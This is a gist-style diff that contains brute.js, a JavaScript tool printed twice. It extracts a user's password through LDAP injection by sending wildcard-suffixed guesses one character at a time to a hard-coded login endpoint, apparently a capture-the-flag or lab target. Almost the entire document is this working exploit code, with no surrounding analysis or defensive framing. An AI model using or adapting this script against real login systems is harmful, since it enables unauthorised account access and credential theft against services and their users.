protoEvangelion · June 17, 2022 00:01
diff --git a/brute.js b/brute.js
 /**
 * As written this will brute force passwords to handle the case where LDAP injection allows the wildcard character:
 * a*
 * ab*
 * abc*
 *
 * If the password works with the * we try that pass without the * to see if it works.
 * If it does, we cracked the password.
 * If not, we continue on adding another char thereby increasing the length of the password by 1.
 *
 * On each iteration, we race the promises to find the first char to resolve successfully and then move on
 */

 /** CONSTANTS */
 const maxPassLen = 100
 const host = 'http://167.99.95.2'
 const port = 32303
 const path = 'login'
 const user = 'reese'

 const url = `${host}:${port}/${path}`

 // Not including escape literal character '\' & '*' character
 const allAsciiChars =
    ' !"#$%&\'()+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[]^_`abcdefghijklmnopqrstuvwxyz{|}~'.split(
        ''
    )

 let currentPass = '*'

 let i = 0

 async function kickOffBruteForce() {
    while (i < maxPassLen) {
        i++

        const successfulChar = await Promise.any(
            allAsciiChars.map((char) => {
                return new Promise((resolve, reject) => {
                    const newPasswordToTry =
                        getPassWithoutWildcard(currentPass) + char + '*'

                    tryLogin(newPasswordToTry).then((x) =>
                        x ? resolve(char) : reject()
                    )
                })
            })
        )

        currentPass = getPassWithoutWildcard(currentPass) + successfulChar + '*'

        const isPassCracked = await tryLogin(
            getPassWithoutWildcard(currentPass)
        )

        if (isPassCracked) {
            console.log({ crackedPass: currentPass })
            return
        }

        console.log({ currentPass })
    }
 }

 const getPassWithoutWildcard = (str) => str.slice(0, -1)

 kickOffBruteForce()

 /**
 * If Promise resolves to true then it succeeded
 */
 function tryLogin(char) {
    return fetch(url, {
        headers: {
            accept: 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',
            'accept-language': 'en-US,en;q=0.9',
            'cache-control': 'max-age=0',
            'content-type': 'application/x-www-form-urlencoded',
            'proxy-connection': 'keep-alive',
            'upgrade-insecure-requests': '1',
            'Referrer-Policy': 'strict-origin-when-cross-origin',
            'User-Agent':
                'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36',
            Referer: url,
            'Accept-Encoding': 'gzip, deflate',
            'Accept-Language': 'en-US,en;q=0.9',
        },
        body: `username=${user}&password=${char}`,
        method: 'POST',
    }).then((x) => x.ok && !x.url.includes('message'))
 }
	/**
	* As written this will brute force passwords to handle the case where LDAP injection allows the wildcard character:
	* a*
	* ab*
	* abc*
	*
	* If the password works with the * we try that pass without the * to see if it works.
	* If it does, we cracked the password.
	* If not, we continue on adding another char thereby increasing the length of the password by 1.
	*
	* On each iteration, we race the promises to find the first char to resolve successfully and then move on
	*/

	/** CONSTANTS */
	const maxPassLen = 100
	const host = 'http://167.99.95.2'
	const port = 32303
	const path = 'login'
	const user = 'reese'

	const url = `${host}:${port}/${path}`

	// Not including escape literal character '\' & '*' character
	const allAsciiChars =
	' !"#$%&\'()+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[]^_`abcdefghijklmnopqrstuvwxyz{\|}~'.split(
	''
	)

	let currentPass = '*'

	let i = 0

	async function kickOffBruteForce() {
	while (i < maxPassLen) {
	i++

	const successfulChar = await Promise.any(
	allAsciiChars.map((char) => {
	return new Promise((resolve, reject) => {
	const newPasswordToTry =
	getPassWithoutWildcard(currentPass) + char + '*'

	tryLogin(newPasswordToTry).then((x) =>
	x ? resolve(char) : reject()
	)
	})
	})
	)

	currentPass = getPassWithoutWildcard(currentPass) + successfulChar + '*'

	const isPassCracked = await tryLogin(
	getPassWithoutWildcard(currentPass)
	)

	if (isPassCracked) {
	console.log({ crackedPass: currentPass })
	return
	}

	console.log({ currentPass })
	}
	}

	const getPassWithoutWildcard = (str) => str.slice(0, -1)

	kickOffBruteForce()

	/**
	* If Promise resolves to true then it succeeded
	*/
	function tryLogin(char) {
	return fetch(url, {
	headers: {
	accept: 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9',
	'accept-language': 'en-US,en;q=0.9',
	'cache-control': 'max-age=0',
	'content-type': 'application/x-www-form-urlencoded',
	'proxy-connection': 'keep-alive',
	'upgrade-insecure-requests': '1',
	'Referrer-Policy': 'strict-origin-when-cross-origin',
	'User-Agent':
	'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36',
	Referer: url,
	'Accept-Encoding': 'gzip, deflate',
	'Accept-Language': 'en-US,en;q=0.9',
	},
	body: `username=${user}&password=${char}`,
	method: 'POST',
	}).then((x) => x.ok && !x.url.includes('message'))
	}